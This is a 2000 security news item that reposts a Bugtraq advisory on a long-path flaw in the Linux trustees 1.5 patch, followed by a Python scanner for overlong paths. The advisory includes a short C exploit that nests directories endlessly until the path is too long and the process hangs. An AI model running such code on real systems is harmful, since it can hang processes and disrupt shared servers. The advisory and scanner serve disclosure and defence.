Originally Published: Monday, 10 April 2000 Author: Alexander Reelsen
Published to: news_enhance_security/Security News

Linux trustees vulnerability found

[BT] An exploit for the recently announced Linux trustees, an advanced permission kernel patch, has been found and announced on bugtraq. This exploit only affects version 1.5 and earlier.


From: "Andrey E. Lerman"
Subject: linux trustees 1.5 long path name vulnerability
To: BUGTRAQ@SECURITYFOCUS.COM

Linux trustees is a kernel patch which provides Netware-like permissions to linux. It is not in the kernel by default.

For more information see project's website at http://www.braysystems.com/linux/trustees.html

Problem description: When accessing a file or directory with a very long path the process hangs in an unkillable state. All other processes are SEGFAULTing when trying to access the unkillable process' /proc entry. So system utilities ps, w, top, killall and the like stop working. Except that, the system continues to function normally. The only solution is reboot.

The only version tested is trustees 1.5 for linux 2.2.14. But it seems that other versions of linux trustees <1.6 are vulnerable.

I'm not sure if this vulnerability is only local DoS. It may be possible to overwrite the process' structures in the kernel, causing privileges elevation. I haven't investigated that possibility yet, so I may be wrong. Servers with open ftp incoming directory, nfs or samba shares are at risk too.

Status: This problem is fixed in linux trustees 1.6, available for linux 2.2.14 and 2.3.99. Thanks to the author of the package, Vyacheslav Zavadsky, for a quick response.

Exploit:

    #include <stdio.h>
    #include <stdlib.h>   /* exit() */
    #include <sys/stat.h>
    #include <sys/types.h>
    #include <fcntl.h>
    #include <unistd.h>

    int main(void)
    {
        /* Create a directory and descend into it, forever, so the current
           path keeps growing until it exceeds what the kernel accepts. */
        while(1) {
            if(mkdir("aaaa",0777)<0) { perror("mkdir"); exit(1); }
            if(chdir("aaaa")<0) { perror("chdir"); exit(1); }
        }

        return(0);
    }

-- END --
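The post above notes that hosts exposing a writable ftp incoming directory or an nfs/samba share are at risk, because an anonymous writer can build the deep tree the loop produces. As an added example (not part of Lerman's post or of the trustees project), the script below walks such a tree and reports any path approaching the kernel path-length limit, so an administrator can spot the condition before a process trips over it. It assumes a Linux host where PATH_MAX is 4096; the function names and the "aaaa" fixture tree are constructed for this example.

```python
"""Added example: scan a writable tree for paths approaching the kernel
path-length limit, the condition the advisory above says hangs a process
under trustees <= 1.5."""
import os
import shutil
import tempfile

# Assumption: the scanned host is Linux, where PATH_MAX is 4096 (limits.h).
PATH_MAX = 4096


def scan_path_lengths(root, warn_at=PATH_MAX // 2):
    """Walk `root` and report the longest absolute path found.

    Returns a dict with:
      max_len     - length of the longest absolute path seen
      deepest     - that path
      overlong    - every path whose length is >= warn_at
      walk_errors - (path, errno) pairs where listing a directory failed;
                    ENAMETOOLONG here means the tree is already past the
                    length the kernel will address at all
    """
    root = os.path.abspath(root)
    report = {"max_len": len(root), "deepest": root,
              "overlong": [], "walk_errors": []}

    def on_error(exc):
        # os.walk hands listing failures here instead of raising; record them
        # so a tree that is already too deep is reported rather than skipped.
        report["walk_errors"].append((exc.filename, exc.errno))

    for dirpath, dirnames, filenames in os.walk(root, onerror=on_error):
        for name in dirnames + filenames:
            full = os.path.join(dirpath, name)
            length = len(full)
            if length > report["max_len"]:
                report["max_len"] = length
                report["deepest"] = full
            if length >= warn_at:
                report["overlong"].append(full)
    return report


def build_nested_tree(base, depth, segment="aaaa"):
    """Constructed fixture: `depth` nested directories named `segment` under
    `base`, the shape an anonymous writer could leave in an incoming area.
    Returns the innermost path."""
    path = base
    for _ in range(depth):
        path = os.path.join(path, segment)
        os.mkdir(path)
    return path


def run_demo(depth=40, margin=150):
    """Build a constructed tree in a fresh temp dir, scan it, clean up, and
    return (report, len(base)) so the caller can reason about absolute lengths.
    Each nesting level adds "/aaaa", i.e. 5 characters, to the path."""
    base = tempfile.mkdtemp(prefix="trustees-demo-")
    try:
        build_nested_tree(base, depth)
        return scan_path_lengths(base, warn_at=len(base) + margin), len(base)
    finally:
        shutil.rmtree(base)


if __name__ == "__main__":
    report, base_len = run_demo()
    print("longest path: %d chars (limit %d)" % (report["max_len"], PATH_MAX))
    print("paths at or past the warning threshold: %d" % len(report["overlong"]))
    for path, err in report["walk_errors"]:
        print("walk error errno=%d at %s" % (err, path))
```

In practice the scan is run over the shared or incoming directory with the default threshold of half PATH_MAX; a non-empty overlong list or any walk error is the signal to remove the offending tree from outside that path (for example with a relative path from its parent) rather than cd into it.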
